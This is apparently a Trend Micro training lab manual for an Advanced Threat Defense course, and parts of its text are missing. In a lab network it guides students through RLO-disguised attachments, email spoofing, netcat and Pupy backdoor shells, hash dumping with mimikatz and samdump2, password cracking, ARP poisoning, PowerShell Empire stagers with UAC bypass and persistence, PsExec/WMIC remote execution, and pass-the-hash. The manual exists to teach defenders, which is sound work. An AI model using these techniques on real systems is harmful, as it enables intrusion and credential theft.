Professional Documents
Culture Documents
Trend Micro, the Trend Micro t-ball logo, InterScan, VirusWall, ScanMail, ServerProtect, and TrendLabs
are trademarks or registered trademarks of Trend Micro Incorporated. All other product or company
names may be trademarks or registered trademarks of their owners.
Portions of this manual have been reprinted with permission from other Trend Micro documents. The
names of companies, products, people, characters, and/or data mentioned herein are fictitious and are
in no way intended to represent any real individual, company, product, or event, unless otherwise noted.
Information in this document is subject to change without notice.
No part of this publication may be reproduced, photocopied, stored in a retrieval system, or transmitted
without the express prior written consent of Trend Micro Incorporated.
Table of Contents
Introduction.................................................................................................. 5
About this Book .................................................................................................................... 7
Laboratory Introduction ....................................................................................................... 7
Trend Micro Training Cloud Access ...................................................................................... 7
Virtual Environment ............................................................................................................. 9
User Credentials .............................................................................................................9
Accessing the Virtual Machines ...................................................................................................10
Introduction
This chapter gives information about the following items:
• Lab introduction
• Training environment
• Lab Setup
• Credentials
• Accessing the Virtual Machines
It only contains the instructions for all exercises and labs discussed throughout this part of the
Advanced Threat Defense course.
Laboratory Introduction
This workshop manual refers to a pre-configured environment which is provided by Certified Trainers
during the course.
As the environment is hosted on the Trend Micro Training Cloud, a host computer with an active
internet connection is required for access.
Ensure to read all information carefully in this chapter, as it outlines how to access and use the
environment.
In order to access the vApp assigned by the Certified Trainer, follow the guidelines below:
1. Open an invitation email sent from noreply-productcloud@trendmicro.com
2. Click the link in an invitation email.
4. Make sure that the status is [Powered On]. Then, click [Enter Lab View] icon.
If the status is [Powered Off], tick the checkbox □ on the left and click ▶icon.
Virtual Environment
The virtual environment contains 4 virtual machines:
The following table lists additional information about the virtual machines:
Note: You will notice, that not all of the virtual machines used during this part of the Advanced
Threat Defense course are running the latest available Operating Systems. As attacks most
likely use similar methodologies, such as sniffing network traffic, using older Operating
Systems will not affect the learning outcome of this course.
User Credentials
The following credentials should be used to log in to each virtual machine:
Note: The screenshots in this section are indicative only; some attributes, such as name, will
depend on the vApp currently assigned to your student account.
1. On [Lab View] window, make sure the [Status] column for all the virtual machines indicates
Powered On
2. Select a virtual machine you would like to access and click [Remote Control] icon.
3. The screen like below appears after [Remote Control] icon is clicked.
4. Logon screen will appear several seconds after above screen appears.
Point of Entry
This chapter demonstrates an example for the 2nd stage of a typical APT, Point of Entry:
• Sending a spoofed email using a malicious attachment
demo.screenshot.jpg
gpj.tohsneedemo.scr
7. Place the cursor at the very left of the second line, before the letter g:
8. Right-click the cursor and select Insert Unicode control character > RLO Start of right-to-
left override:
11. Right-click and select Insert Unicode control character > LRO Start of left-to-right
override.
12. The first half of the text, rcs.omed, flips horizontally again, this time forming
demo.screenshot.jpg:
Using Unicode control characters, we are able to manipulate Windows into displaying the
potentially harmful and executable SCR file as a harmless JPG file.
13. Copy the modified text (second line) to the clipboard.
Copying the text may be tricky as the cursor will move backwards (right to left) from “g” to
“e” of “eenshot.jpg”. Double-click on the line will help selecting the whole line.
The actual file name will not be changed; however, the controls we have inserted simply
dictate the direction of the letters so that Windows will know how to present them to the
user.
14. Open Windows Explorer.
15. Navigate to “C:\Tools”.
16. Right-click on “payload.exe” and select Rename.
17. Select all of the existing text, including the file extension.
Paste the modified text as the new name for the file, making sure the old “.exe” extension is
removed in the process.
When prompted about the new file extension, click on “Yes”:
19. As the unicode control characters do not affect some views of Windows Explorer, make sure
that you set the view to List or Details:
Note: For testing purposes, Security and Authentication options are not enforced in this
environment.
6. Click “OK”.
7. On the Account Settings, click the Attacker mailbox at the top of the list and select Manage
Identities > Add.
8. Specify boss@your.company.com as email address and click “OK”.
Ensure that the Outgoing Server (SMTP) is the correct one, as seen in step 5.
9. Close all pop ups and start composing a new email by click on “Write”.
Specify the following details:
From: boss@your.company.com
To: Victim@ACE202.TrendMicro
Subject: Demo Screenshot
Body:
Please check the attached screenshot.
Regards,
Boss
10. Click “Attach” and attach the modified demo.screenshot.jpg from the “Tools” folder.
Note that the real filename of the attachment will still be displayed by the email client.
11. Click on “Send”.
12. Switch to the Victim machine to check the email we have sent.
13. Open Mozilla Thunderbird. Enter the password for the Victim account when prompted.
14. Mozilla Thunderbird automatically sends and receives emails on launch.
If it does not retrieve messages automatically, click the “Get Mail” button. Our test email we
have sent from the Attacker machine should appear in the Inbox:
16. Open a command prompt and navigate to the user's temp folder:
cd %temp%
17. List the content of the user's temp folder using the command:
dir
A normal image will open in the Windows Photo Preview application. This is the normal
behavior expected by the user. However, behind the scenes, the user is not aware that the
executable malware we have sent is also capable of doing other things, including dropping a
malicious payload.
21. Go back to the command prompt and display the contents of the user's temp folder again:
dir
This time, a Successful_Attack.txt file is listed. This is the payload of our executable file,
which proves our attack was successful. In real attack scenarios, this could be another
malicious executable rather than a “.txt” file.
Netcat (nc) has been added to “c:\windows\system32”, so we can run the application from
anywhere in the command line.
Note: Refer to the Appendix B.1 on page 113 for additional information on Netcat parameters.
4. This will start Netcat, which will listen on port 4444 and pass on cmd.exe to the remote host once
a connection is established:
Note: At this stage, anyone who connects to the Victim machine on port 4444 will be able to
receive shell access on the target.
As mentioned above, this command will give us shell access to the Victim machine.
7. Type the following command:
ipconfig
8. As a result, the IP configuration of the Victim machine should be displayed, as we’re running the
command directly on a command prompt on the Victim machine:
9. Close the command prompt on both, the Attacker and the Victim machine.
nc -lvp 4444
5. This command establishes communication with the Attacker machine on port 4444 and passes
on cmd.exe to the Attacker:
ipconfig
8. We can see that “ipconfig” displays Victim's IP address from the Attacker's command prompt:
9. Close the command prompt window on both, the Attacker and Victim machines.
Pupy is an open-source, cross-platform, multi function RAT and post-exploitation tool mainly written
in python. Pupy can reflectively migrate into other processes.
1. Login to the Ubuntu machine. (default user: ubuntu, password: novirus=123)
2. Right-click on the Desktop and select Open Terminal.
3. Navigate to the directory of Pupy:
cd pupy/pupy
Note: As commands in Linux operating systems, such as Ubuntu, are case-sensitive, ensure to type
all commands with proper case as shown in this manual.
Refer to Appendix B.2 on page 113 for references on the Pupy command set.
4. Type the following command to create “backdoor.exe”, which will be used as a remote client
capable of connecting back to the Ubuntu machine:
6. In order to receive any communication from a client running the “backdoor.exe”, we will need to
create a listener, waiting for incoming connections. Run the following command:
sudo ./pupysh.py
Once “backdoor.exe” is executed on a Victim machine, it will establish a shell session back to the
Pupy shell.
8. Switch to Victim machine.
9. Select Start > Run and type the following command to connect to a SMB share, where the
“backdoor.exe” is stored:
\\192.168.100.151\winshare
10. From the “winshare” folder, copy the backdoor.exe to the desktop of the Victim machine.
11. Close or minimize the Windows Explorer window.
12. Execute the backdoor.exe.
13. You will notice, that there is no graphical interface for the backdoor.exe. To confirm it is running,
right-click anywhere on the taskbar and select Start Task Manager.
14. In the Task Manager window, click on the tab “Processes”.
15. The backdoor.exe will be listed as running:
17. In the Pupy shell window you can see the “Session 1 opened...”, displaying the IP address of the
Victim.
This proves the connection between Ubuntu and Victim machine has been established
successfully:
help
19. Type the following command to get more info about the current session:
info
20. This will display different items, such as the registered user name and host name belonging to
the Victim machine:
21. Try to get shell access (command prompt) to the Victim machine with the command:
shell
This will launch the command prompt from the Victim machine:
22. Confirm this is the command prompt of the Victim machine with the command:
hostname
ipconfig
This command shows the IP configuration of the Victim machine. Both commands prove, we have
currently shell access on the target machine.
24. Leave the command prompt of the Victim using the command:
exit
The connection with the Victim machine stays open, the “exit” command only closes the remote
command prompt.
25. Open notepad.exe on the Victim using exec command:
exec notepad.exe
migrate -p explorer.exe
When done properly, this allows to hide malicious processes within “normal” processes.
31. Once the process is migrated into explorer.exe, we can see that another session has opened while
the original session was automatically closed:
This is normal behavior, as the process itself has been changed and the communication needed
to be re-established.
32. Switch to the Victim machine.
getpid
40. The output should be the same as the PID shown on the Task Manager in step 38:
We have now confirmed that we have successfully migrated “backdoor.exe” into the explorer.exe
process, making the application not obviously visible.
41. Get the Session ID by typing the command:
sessions
42. Kill the session using the Session ID received in step 41 - in our example the Session ID is “1”:
sessions -k 1
Lateral Movement
This chapter, supporting the 4th stage of a typical APT attack, demonstrates
the following methodologies:
• Retrieving Password Hashes: LM & NTLM
• Cracking Password Hashes
• Performing ARP Poisoning
• Fileless Attacks
• Privilege Escalation
• Other infiltration possibilities: psexec, at, wmic
• Remote Port Forwarding
• Authentication using Pass-the-Hash
• Kerberos Golden Ticket Attack
cd \tools
If the command is executed properly, the message "The command completed successfully."
will appear.
Note: Refer to Appendix B.3 on page 114 for more information about the net command.
5. View the hashes of the newly created account test using gsecdump-v2b5.exe:
Note: Refer to Appendix B.4 on page 114 for more information of gsecdump parameters.
6. Since we did not set a password for this account, the hashes for the test account appear as:
aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
7. View the hashes of the built-in Guest account using the command:
8. Take note of the LM and NTLM hashes for the Guest account, which does not require a
password to log in. They are exactly the same as the ones from the newly created test
account:
10. View the hashes of the test account again, to confirm the changes:
11. Compare the previous password hashes with the new ones. Both the LM and the NTLM
hashes should have been updated with the following:
8dc75c53a8482736aad3b435b51404ee:0c9743903053f0ccf71fd4938d2c3569
At first glance, the hashes are completely different; however, upon looking closely, the
second 16 characters of the LM hash have the value "aad3b435b51404ee" which is also
similar to the second 16 characters of the blank password.
12. Change the password of the test account to an all-capital "TREND”:
14. Compare the hash of the passwords "Trend" with the all-capital "TREND". You will notice that
the NTLM hash changed but the LM hash remained the same. This shows that the LM hash is
not case-sensitive:
15. Change the password of the test account to use the 14-character password
"_Trend Trend_":
17. The LM hash has a 14-character restriction and Windows calculates the LM hash by dividing
the password into two 7-character sets. In this example, the password "_Trend Trend_" is
divided into "_Trend_" and another "_Trend_". By looking at the LM hash, you will notice that
the hash for the 7 characters repeats:
The hash for "_Trend_" is "1a01f628ff51c0eb", so the hash for "_Trend Trend_" becomes
"1a01f628ff51c0eb1a01f628ff51c0eb"
18. Change the password of the test account to "_Trend Trend_ABCDEFGH":
This new password has more than 14 characters which exceeds the LM hash limit.
19. View the hashes of the test account again:
20. The LM hash will look familiar, as it is just the same as the LM hash of a blank password. This
means, when a password exceeds the 14-character limit, the NTLM hash will be calculated but
the LM hash will have no value:
cd \tools\samdump2
5. Create a new user account named test with "Trend" as its password:
Note: Refer to Appendix B.5 on page 115 for more information about samdump2 parameters.
7. The LM and the NTLM hashes should have the following values:
aad3b435b51404eeaad3b435b51404ee:0c9743903053f0ccf71fd4938d2c3569
8. If you remember from the previous activity, if the password is set to "Trend", the hashes
change to this value:
8dc75c53a8482736aad3b435b51404ee:0c9743903053f0ccf71fd4938d2c3569
Comparing these two results, we can see that the NTLM hashes are the same but the LM
hashes are not. The LM hash in this exercise has the same value as that of a blank password.
This is due to a local security policy in Windows 7, which is enabled by default.
9. To change this security policy, click on Start and type secpol.msc. This will open the Local
Security Policy Management Console.
10. Expand Security Settings > Local Policies > Security Options in the left panel:
11. Double-click on Network security: Do not store LAN Manager hash value on the next
password change in the list of settings.
12. You will see, this policy is enabled by default. This causes the LM hash to appear as that of a
blank password:
LM & NTLM HASHES: SECURITY POLICY ON WINDOWS 7 PREVENTING LM HASH BEING STORED
Note: Do not enable this policy on the Windows 2003 server, as this otherwise will cause follow
up exercises to fail.
cd \tools
You will receive a warning for user test4, as the password exceeds the 14 characters. Press
<Y> to create the user.
5. Dump the hashes of all user accounts into a text file named hashes.txt:
cd \tools\samdump2
9. On the command prompt, type in the following commands to create 3 accounts with different
passwords:
10. Dump the hashes of all user accounts into a text file named hashes.txt:
6. Leave all other options as per default and click “Next” three times to start the installation.
The installation process begins. This may take a few minutes to complete.
7. Click “Next” when the installation is complete, followed by “Finish” to close the Setup Wizard.
8. Double-click the ophcrack shortcut on the desktop.
9. Click “Load” from the menu and select PWDUMP file.
10. In the Open PWDUMP File pop up, select C:\Tools\hashes.txt and click “Open”:
12. In the Tables pop up, click on the Install button. The "Browse For Folder" window will appear.
13. Select the folder C:\Tools\tables_xp_free_fast and click “OK”.
14. Click “OK” again to go back to the main window. The table XP free fast should be listed in
the bottom panel:
Note that ophcrack splits and displays the LM password in 2 different columns, “LM Pwd 1”
and “LM Pwd 2”.
15. Click on the “Crack” button to start retrieving the passwords from the hashes.
16. Click on the plus + sign next to XP free fast on the table list.
This will provide the progress for the current password retrieval.
You will notice that the LM PWD 1, LM PWD 2, and NT Pwd columns are slowly being
populated with the passwords you have provided at the start of the exercise.
Certain user accounts’ password will be shown as "not found" due to different reasons:
cd \tools\john179j5\run
4. Use the John the Ripper tool to crack the password from the hashes using the brute force
technique:
Note: Refer to Appendix B.6 on page 115 for further information on john parameters.
5. This process may take some time to complete because of the complexity of one of the
passwords we have set. Within just a few seconds however, we should see the results for the
first two passwords.
Pressing any key will list the current password that John the Ripper is trying to crack.
6. Once the tool has finished with the first two hashes, abort the process by pressing
<CTRL>+<C>.
7. Three new files, namely john.pot, john.rec and john.log, have been created. View the contents
of the john.pot file for the list of the passwords acquired through brute force:
type john.pot
8. The file contains successfully cracked passwords with their respective NTLM hashes:
We do not need to change any settings for WinPcap, therefore install it with all default
options.
6. Ensure to leave Automatically start the WinPcap driver at boot time selected and click
“Install”:
4. Open a command prompt and run the following command to query the ARP cache:
arp -a
ping 192.168.100.111
arp -a
8. The MAC addresses of all machines, Attacker (192.168.100.111), Server (192.168.100.131) and
Ubuntu (192.168.100.151), are now in the list, marked as “dynamic”:
Take also note that the MAC address of each machine is unique.
5. In case the list contains already entries from a previous install, right-click an entry and select
Remove All.
6. Right-click on an empty space on the table and select Scan MAC Address:
7. In the Mac Address Scanner pop up, ensure to select All hosts in my subnet:
10. Write down in the table below, the corresponding MAC addresses of each IP addresses after
the tool scanned for MAC addresses:
IP Address MAC Address
192.168.100.121 005056014F61
192.168.100.131 005056014F63
192.168.100.151 0050560156B9
MAC AND IP ADDRESS MAPPING
11. Click on the APR tab at the bottom to configure ARP poisoning routing.
12. Click on an empty slot on the table at the top to enable the Add to List button:
15. Select the IP address of the Server, 192.168.0.131, on the right panel and click “OK”.
Note: It does not matter, which machine is selected first on the left. ARP poisoning will cause
both targets to update their ARP cache of the opposite side’s MAC address to the MAC
address of the Attacker.
16. A new entry will be listed in the main window of Cain, showing the status “Idle”:
You will notice, the status of the selected targets in the list will change from “Idle” to
“Poisoning”.
18. Switch back to the Victim machine.
19. Using a command prompt, check the ARP cache again:
arp -a
The ARP cache now shows the Server machine, 192.168.100.131, having the same MAC
address as the Attacker machine.
20. Connect to the FTP server hosted at the Server machine using the command:
ftp 192.168.100.131
quit
.exe
Notice that FTP has a value of (1). This means the Cain program was able to sniff one (1)
password sent using the FTP protocol.
26. Switch to the Server machine.
27. Using a command prompt, ping the Attacker machine:
ping 192.168.100.111
arp -a
The output should show, that the Victim, 192.168.100.121, is cached with the same MAC
address as the Attacker on 192.168.100.111.
29. Stop ARP Poisoning and the Network Sniffer using their respective icons:
Note: ARP Poisoning works only on local networks within the same subnet. Therefore, Cain &
Abel will not be useful when trying to perform above activity between routed networks.
cd empire
sudo ./empire
Note: Refer to Appendix B.7 on page 116 for an overview of Powershell Empire commands.
Before Powershell Empire can be used for exploitation and further infiltration of a target
machine, Listeners need to be created. Listeners in Powershell Empire are the channels which
receive connections from our target machine.
5. Type the following command to navigate into the listener option:
listeners
It is normal to have a result of “No listeners currently active” on the list when you enter this
command for the first time.
6. To view options under listeners, type:
help
7. Start a listener module for http in Powershell Empire using the command:
uselistener http
help
9. Use the following command to show information and required parameters for the particular type
of listener:
info
Fields under “Required” that are set to “True” should be filled with appropriate values. In this
case, all are set accordingly.
10. Start the listener using the command:
13. To list all available stagers, type the following command, followed by <Space>, <Tab>, <Tab>:
Stagers in Powershell Empire are used to set the stage for the post-exploitation activities. They
are similar to payloads, which are used to create a connection back to Empire.
14. This will display a list of available stagers:
Powershell Empire can create loaders with different file types like “.vbs”, “.bat” etc. In this
exercise, we will use a “.lnk” file as a loader (stager).
15. To use a link file (shortcut) as a stager, type the following command:
16. Similar to the command uselistener, we can get more information and parameters about this
particular stager by running the command:
We can see that Listener is a required parameter, but has no value set yet. We will need to supply
the value in order to use the stager.
17. Set the Listener parameter of the stager to http:
18. As we’re creating a shortcut file, we also need to set the location of the stager output file. To
specify the location, type in the following command:
19. This completes the configuration of the stager. To execute the stager, run the command:
20. The output will indicate, that the lnk file has been successfully created:
\\192.168.100.151\winshare
This will open a SMB share located on the Ubuntu machine, where we saved the “.lnk” stager file.
24. Copy the clickme.lnk to the desktop.
25. To analyze the content of the shortcut file, open Notepad.
26. In Notepad, open the file clickme.lnk from the Desktop.
Ensure to select Format > Word Wrap to see all contents.
27. We can identify, that this indeed is a script written in Powershell; even though the content of the
script is encoded in base64 and not readable:
The agent will report back with a random name. To identify easily what agent is being used in
case of multiple connections, it is recommended to rename the agent.
35. Type the following command to rename the agent:
Note: Replace 94MDPWE8 with your own agent name as identified in step 34.
36. To identify whether the rename was successful, run this command again:
37. To interact or use the agent called “Victim1”, use the following command:
38. Similar to previous modules, the following command allows to see a list of all available
commands:
39. To use the command prompt on the target machine to display its hostname, type the command:
This shows, that the command was executed successfully on the remote machine rather than
locally.
41. Press <Enter>.
42. To view system information of the target, run the command:
43. The output will list few information about the target, such as the user currently running the
process, the Operating System, IP address etc:
In this activity, we used a “.lnk” file and not a Portable Executable file as a loader for our
backdoor, which will be later used for lateral movement.
44. Leave the Powershell Empire console open in preparation for the next activity.
Note: Before performing this exercise, ensure you have properly configured the backdoor and
reverse connection in Exercise 8.
usemodule
Modules in Powershell Empire are used to perform specific tasks, such as bypassing UAC,
creating persistence, dump password hashes etc.
3. First, we want to use a module capable of checking for any Windows privilege escalation vectors.
Run the following command:
usemodule privesc/powerup/allchecks
4. More information and parameters about this particular module can be obtained, similar to
listeners and stagers, with the command:
info
This module is used to run all current checks for windows privilege escalation vector. It has only
one required field, agent, which is already setup accordingly.
execute
As you can see at the top of the output, the module detected that the local group has
administrative privileges and advises to run a “BypassUAC attack” in order to elevate privileges.
8. Press <Enter>, followed by the command:
back
usemodule privesc/bypassuac
10. Type the following command to gain more insight about this specific module:
info
11. Any parameter, with the property Required set to “True” must be supplied. On this module,
Listener and Agent are the parameters required, whereas Listener has no value set yet:
12. To set a value for the Listener parameter, run the following command:
This will set the Listener to http, which we have already set up during Exercise 8.
info
execute
15. When requested, press <Y>, followed by <Enter> to run the task on the remote machine:
Once the module “BypassUAC” was executed successfully, the target machine will use a new
agent for the elevated connection.
16. To identify the new agent, press <ENTER>, followed by the two commands:
back
agents
17. The list of agents should now contain 2 connections. Notice the * in front of the username for the
new agent:
The asterisk (*) indicates that the new agent created has successfully performed “BypassUAC”
and elevated from a medium integrity process to a high integrity process. See below the different
integrity values:
Integrity Level Assigned Access Rights
High Full Administrator Rights
Medium Standard User Rights
Low Highly Restricted
PRIVILEGE ESCALATION: PROCESS INTEGRITY LEVEL
18. To easily identify the name of the agent, rename the latest added agent to Victim1A:
Note: Replace TMZ14E6Y with your own agent name as identified in step 18.
interact Victim1A
We have now established communication with the Victim with full administrative privileges. In
order to keep those rights, we will require persistence, allowing to survive a reboot of the target
machine. For this exercise, we will use the “schtasks” module which maintains persistence of a
stager using the task scheduler of Windows, running as SYSTEM account.
21. Select the schtasks module by typing the following command:
usemodule persistence/elevated/schtasks*
22. List all required parameters of the module using the command:
info
24. Even though they are optional parameters only, we will change the settings for Listener and
OnLogon:
OnLogon sets the trigger of the scheduled task to “user logon”; as soon as a user logs in to the
remote machine, the task is being executed.
Listener is not required for this module, however we configured it to ensure that after a reboot
the target will reconnect to the Attacker machine.
Also note down the value of the TaskName, as we can use it later during the exercise to correctly
identify the created task.
25. To start the schtasks module, run the command:
execute
26. Once asked, press <Y> and <Enter> to run the module:
27. Once executed, press <Enter> again and type the back command twice:
33. Select the action Start a program from the list and click “Edit”.
34. The Program/script parameter is powershell.exe itself. However, the Add arguments (optional)
item shows the generated code by the schtasks module.
35. To test the privilege escalation and the persistence, reboot the Victim machine.
36. Once rebooted, login to the Victim machine.
37. Switch back to the Ubuntu machine.
38. As a result of the Updater scheduled task, there will be a new agent created. In Powershell
Empire, press <Enter>.
39. Type the following command to list all available agents:
list
40. The first two agents are marked in red, which means the agents are inactive:
Also take note of the new agent’s username. This agent is now running as SYSTEM instead of
Victim, which means any restriction on the Victim machine are successfully bypassed.
41. Rename the new agent to Victim1B and interact with it:
Note: Replace M7YF4TXW with your own agent name as identified in step 40.
42. Use the remote command prompt command to see the information about the agent:
shell hostname
shell whoami
45. You will notice, that the process is now running under SYSTEM:
usemodule credentials/powerdump*
48. There are no parameters required, so we can run the module without modification:
execute
49. As the result, this module returns the hash dumps of local users from this machine:
Similar to other hash dump tools we’ve discovered in previous exercises, the user credentials are
composed of [Username:UserID:LM Hash:NTLM Hash].
50. Press <Enter> and type the command:
back
51. To access credential dumps from Active Directory, we will use the module mimikatz, which has a
function called “logonpasswords”. Use the following command to use and execute the module:
usemodule credentials/mimikatz/logonpasswords*
execute
52. The output will reveal user accounts, both local and from AD, from the memory:
PRIVILEGE ESCALATION: REVEAL USER ACCOUNT CREDENTIALS FROM MEMORY USING MIMIKATZ
This shows that the server certificate has been signed by the CA "ACE202-CA."
8. Click on “OK” and close Internet Explorer.
9. Switch to the Attacker machine and open Cain & Abel, if it's not already open.
10. Click on the Start/Stop Sniffer icon to start packet sniffing.
11. Click on the Start/Stop APR icon to start ARP poisoning routing.
The status in the APR tab should change from “Idle” to “Poisoning”.
12. Switch to the Victim machine.
13. Open the Control Panel and navigate to Network and Internet > Internet Options.
14. On the Internet Options pop up, click “Delete...” in the section Browsing history.
15. Place a check on all boxes and click “Delete”:
20. Navigate to Passwords > HTTP on the left panel. Notice that HTTP has a value of (4). This means
Cain & Abel was able to sniff four (4) passwords via HTTP:
This would be normal behavior with self-signed certificates & expired certificates. In this case
however, it is due to a spoofed certificate.
34. Click on Continue to this website (not recommended).
35. On the address bar, click on Certificate error next to the URL:
41. Stop ARP Poisoning and the Network Sniffer using their respective icons:
cd \tools
ipconfig
If this is the first time the PsExec program is executed, an end-user license agreement from
Sysinternals will appear. Click “Agree” to continue.
Note: Refer to Appendix B.8 on page 116 for command parameters of PsExec.
5. The command prompt displays the results for the Victim machine as indicated by the IP address,
192.168.100.121:
6. Using PsExec.exe, view the contents of the root directory of the Victim machine using the
command:
8. PsExec is able to copy required executables to the target prior to execution. Run the following
command:
This command will copy “Attack.exe” to the Victim machine for remote execution (“-c”) with
elevated privileges (“-h”).
9. The command returns error code 0, which means the process did not encounter any errors:
10. Switch to the Victim machine to verify if the process was executed.
11. Open a normal command prompt, not an elevated one.
12. List the contents of the root drive:
dir c:\
13. A file called Attack.txt should be present. This file is generated by the Attack.exe process which
was remotely executed by the Attacker machine:
del c:\Attack.txt
The command will fail due to Access being denied. This is caused by the parameter “-h”, as this
will create the process with elevated permissions.
15. Open an elevated command prompt and try to delete the file again:
del c:\Attack.txt
dir c:\
The command returns with an error code 0, which means the process did not encounter any
errors.
21. Switch to the Victim machine to verify if the process was executed.
22. Using the command prompt, list the content of the root folder:
dir c:\
more C:\Attack.txt
24. The text "Successful Attack" is displayed along with the Process Owner \\NT
AUTHORITY\SYSTEM:
cd \Tools\samdump2
samdump2.exe -l
28. This will dump on the screen the hashes for all existing accounts:
PsExec is able to copy executable files to the target prior to remote execution. However, if there
is a dependency as in the case with samdump2, PsExec will not transfer any other required file.
Therefore we need to copy this file before running the PsExec command.
30. Execute Samdump2.exe remotely using PsExec.exe:
31. Once executed, the password hashes of all existing local accounts on the Victim machine will be
displayed on the screen:
del c:\Attack.txt
35. Open Event Viewer by click on Start > Run > eventvwr.
36. On the left panel, expand Windows Logs > System.
37. Opening one of the last few events, it should indicate that the PSEXESVC service entered the
running state:
40. The latest audit logs will show, that the Victim account was successfully logged in:
41. Click on the Details tab of the entry showing a successful login.
42. Expand System and scroll to the very bottom.
This will show that the account was logged in from the IP address of the Attacker machine,
192.168.100.111.
43. Switch back to the Attacker machine.
44. Using command prompt, delete the existing connection to the Victim machine in preparation for
the next activity:
Refer to Appendix B.9 on page 117 for parameters of the at command as well as Appendix
B.10 on page 117 for schtasks parameters.
cd \tools
3. Connect to the Victim’s admin share via SMB and transfer the Attack.exe file:
4. Using the Victim administrator account on the Victim machine, we copied the Attack.exe file
from the Attacker machine to the Windows folder of the Victim machine:
This is to confirm the current time of the virtual machine, as it might be in a different time
zone than your own.
2. Add a new job on the Victim machine a few minutes after the current time. In below example,
“9:04” is used as the current time on the Victim machine is “9:02”:
3. The at command should return Added a new job with job ID = 1 if the execution was
successful:
cd \Windows\Tasks
dir
7. Wait for the 3-4 minutes depending on the time you have set. Once the time has elapsed,
view the contents of root directory:
dir c:\
8. The Attack.txt file, a payload generated by the Attack.exe process, should appear on the
results:
more c:\Attack.txt
The text file contains the message "Successful Attack" with the Process Owner \\NT
AUTHORITY\SYSTEM.
10. Open Control Panel and navigate to System and Security > Administrative Tools > Task
Scheduler.
11. On the left panel, select Task Scheduler Library.
12. Select At1 in the list of tasks, and open the tab “History”:
The latest entry should log the successful execution of the At1 task.
13. Open an elevated command prompt and delete the Attack.exe from “C:\Windows”:
del C:\windows\attack.exe
del c:\Attack.txt
cd \tools
4. Copy the Attack.exe file to the Victim machine's “C:\Windows” directory using the mapped
network drive R:
Using the Victim’s administrator account on the Victim machine, we copied the attack.exe file
from the Attacker machine to the Windows folder of the Victim machine.
If this is the first time you run WMIC, you will see a message indicating that WMIC is being
installed.
Note: Refer to Appendix B.11 on page 117 for further information on wmic.
2. Once finished, it will execute the command on the Victim machine and will display the
following message:
dir c:\
The Attack.txt file, which is a payload generated by Attack.exe, should appear in the file list.
5. View the content and the details of the Attack.txt file:
more c:\Attack.txt
The text “Successful Attack" is displayed along with the Process Owner.
6. Open Control Panel and navigate to System and Security > Administrative Tools > Event
Viewer.
7. On the left panel, expand Windows Logs and select Security.
8. Inspect the latest logon entries. One of them shows that the Victim account successfully
logged on from the IP address of the Attacker machine:
9. Select View > Show Analytic and Debug Logs in the main menu.
10. On the left panel, expand Applications and Services Logs > Microsoft > Windows > WMI-
Activity and select Trace. The list is currently empty, no events were logged.
Note: With the default settings of Windows Operating Systems, not all logging is enabled.
Therefore it is expected to have the WMI Activity Trace log being empty. This is very
important to consider, especially in investigation scenarios, as useful information might
not be readily available when needed.
2. When prompted about enabling and clearing the log, press <y>:
del c:\Windows\Attack.exe
del c:\Attack.txt
cd \tools
4. Add the new user harry to the Victim machine's administrators group:
5. Check if you can FTP to the Server machine by using the command:
ftp 192.168.100.131
6. The results show that you are not allowed to use FTP on the remote host:
With the above command, we create a port forwarding rule on the Victim, which redirects
any incoming connection on port 2121 to port 21 of the Server machine.
Note: Refer to Appendix B.12 on page 118 for more information on the netsh command.
9. Each of the PsExec.exe commands should return error code 0 when completed.
10. Use the following 2 commands to connect to port 2121:
ftp
open 192.168.100.121 2121
We have configured this port to forward traffic to port 21 of the Server machine.
The Attacker machine is now allowed to connect to the Server FTP, as the Server sees the
traffic coming from Victim, rather than the Attacker machine.
11. Provide the following credentials to the FTP:
Username: FtpUser
Password: FtpPass
quit
4. Close the error message and switch back to the elevated command prompt.
5. Still in the “C:\Tools” directory, enable RDP access remotely on Victim via the command:
The above command uses PsExec to manipulate registry entries on the target machine,
specifically the “fDenyTSConnections” key.
6. Add a firewall exception for RDP:
REMOTE RDP: MANIPULATING REGISTRY KEYS AND ADVFIREWALL SETTINGS WITH PSEXEC
8. Switch back to the RDP Client and try to connect again to the Victim machine on
192.168.100.121.
This time, a prompt will ask for login credentials. Specify the credentials for the Victim user.
9. When prompted about the identity of the remote computer and the validation of the
certificate, click on “Yes”:
Optionally, the Don't ask me again… check box can be enabled to prevent this notification in
the future.
This will start a Remote Desktop session to the Victim machine and proves, that our remote
execution using PsExec was successful.
10. Close the RDP client.
Note: The use of wce is limited to a certain set of Operating Systems. When used in environments
with newer version of Windows, such as Windows 10 and Windows 2012, wce might not work
as expected. Alternative tools however could be utilized, such as the mimikatz framework.
Refer to Appendix B.13 on page 118 for information about wce parameters.
x:
cd \tools
gsecdump-v2b5.exe -s > hashes.txt
c:
net use x: /delete
cd \tools
notepad hashes.txt
8. The information in the text file are stored in the following sequence:
9. Highlight the LM and NTLM hash only for the account ACE202\Victim and copy it to the
clipboard:
cd wce_v1_41beta_universal
wce -w
12. This command will display the username and the cleartext password of the account that is
currently logged on:
13. Attempt to access the content of the C: drive of the Victim machine remotely without specifying
a user account:
dir \\192.168.100.121\C$
As there was no user specified, this command uses the credentials of the user currently logged
in. As that user has no permissions on the Victim machine, the “dir” command will fail.
14. Use wce to change the NTLM credentials of the current command prompt window:
Ensure to replace “[LM Hash]:[NTLM Hash]” with the contents of your “hashes.txt”, taken in step
9.
Above command will change the NTLM credentials, but this is only valid for the command prompt
wce is started in.
15. Once executed, wce will return the message NTLM credentials successfully changed:
16. Verify the new NTLM credentials allow to query the contents of the C: drive remotely from the
Victim machine:
dir \\192.168.100.121\C$
17. By replacing the NTLM credentials of the current logon session, the dir command is now
successful:
18. Execute the Attack.exe file remotely on Victim using PsExec.exe, this time without specifying a
user or password:
cd..
PSTools\PsExec.exe \\192.168.100.121 -c Attack.exe
19. Verify if the process was executed properly by looking for the generated Attack.txt file
remotely:
dir \\192.168.100.121\C$
more \\192.168.100.121\C$\Attack.txt
21. The results will show that the process was executed by the ACE202\Victim account. This proves
that the Pass-The-Hash technique was successfully utilized:
22. List the logon sessions and NTLM credentials locally using wce:
cd wce_v1_41beta_universal
wce -l
23. This will list all logon sessions, which now also includes the Victim account:
del c:\Attack.txt
29. Enter the IP address of the Attacker machine, 192.168.100.111, on both the Server name and
Connection name fields.
Enter the logon information of the Administrator and click “OK”:
30. Double-click on the newly created Remote Desktop connection on the left panel.
31. Using the Administrator account to connect to the Attacker machine creates a logon session on
the target. Do not click “Yes”.
32. Leave the Remote Desktop connection window open and switch to the Attacker machine.
